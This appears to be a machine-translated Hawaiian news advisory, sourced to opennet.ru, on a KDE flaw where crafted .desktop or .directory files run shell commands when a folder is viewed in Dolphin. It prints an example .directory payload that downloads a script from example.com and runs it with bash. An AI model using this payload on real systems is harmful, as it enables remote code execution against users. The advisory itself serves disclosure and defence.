I KDE , ka mea e hiki ai i ka mea hoʻouka ke hoʻokō i nā kauoha kūʻokoʻa ke ʻike ka mea hoʻohana i kahi papa kuhikuhi a waihona i loaʻa nā faila ".desktop" a me ".directory" i hoʻolālā kūikawā ʻia. Pono ka hoʻouka ʻana e nānā wale ka mea hoʻohana i ka papa inoa o nā faila ma ka Dolphin file manager, e hoʻoiho i kahi faila desktop maikaʻi ʻole, a i ʻole e kauo i kahi pōkole ma luna o ka pākaukau a i ʻole i kahi palapala. Hōʻike ka pilikia iā ia iho i ka hoʻokuʻu ʻana o nā hale waihona puke a me nā mana kahiko, a hiki i ka KDE 4. Ke mau nei ka vulnerability (ʻAʻole hāʻawi ʻia ʻo CVE).
Hoʻokumu ʻia ka pilikia ma muli o ka hoʻokō hewa ʻole ʻana o ka papa KDesktopFile, ka mea, i ka wā e hoʻoponopono ai i ka ʻano "Icon", me ka ʻole o ka pakele pono ʻana, hāʻawi i ka waiwai i ka hana KConfigPrivate ::expandString(), e hana ana i ka hoʻonui ʻana i nā huaʻōlelo kūikawā shell, me ka hana ʻana. nā kaula "$(..)" e like me nā kauoha e hoʻokō ʻia. Kūlike ʻole i nā koi o ka kikoʻī XDG, hoʻokō hana ʻia nā pūpū me ka hoʻokaʻawale ʻole i ke ʻano o nā hoʻonohonoho, ʻo ia hoʻi. ʻaʻole wale i ka wā e hoʻoholo ai i ka laina kauoha o ka noi e hoʻokuʻu ʻia, akā i ka wā e kuhikuhi ai i nā kiʻi i hōʻike ʻia e ka paʻamau.
No ka laʻana, e hoʻouka e hoʻouna i ka mea hoʻohana i kahi waihona zip me kahi papa kuhikuhi i loaʻa kahi faila ".directory" e like me:
[Komo Papahana] Type=Papa kuhikuhi
Ikona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Ke hoʻāʻo ʻoe e nānā i nā ʻike o ka waihona ma ka Dolphin file manager, e hoʻoiho ʻia ka palapala https://example.com/FILENAME.sh a hoʻokō ʻia.
Source: opennet.ru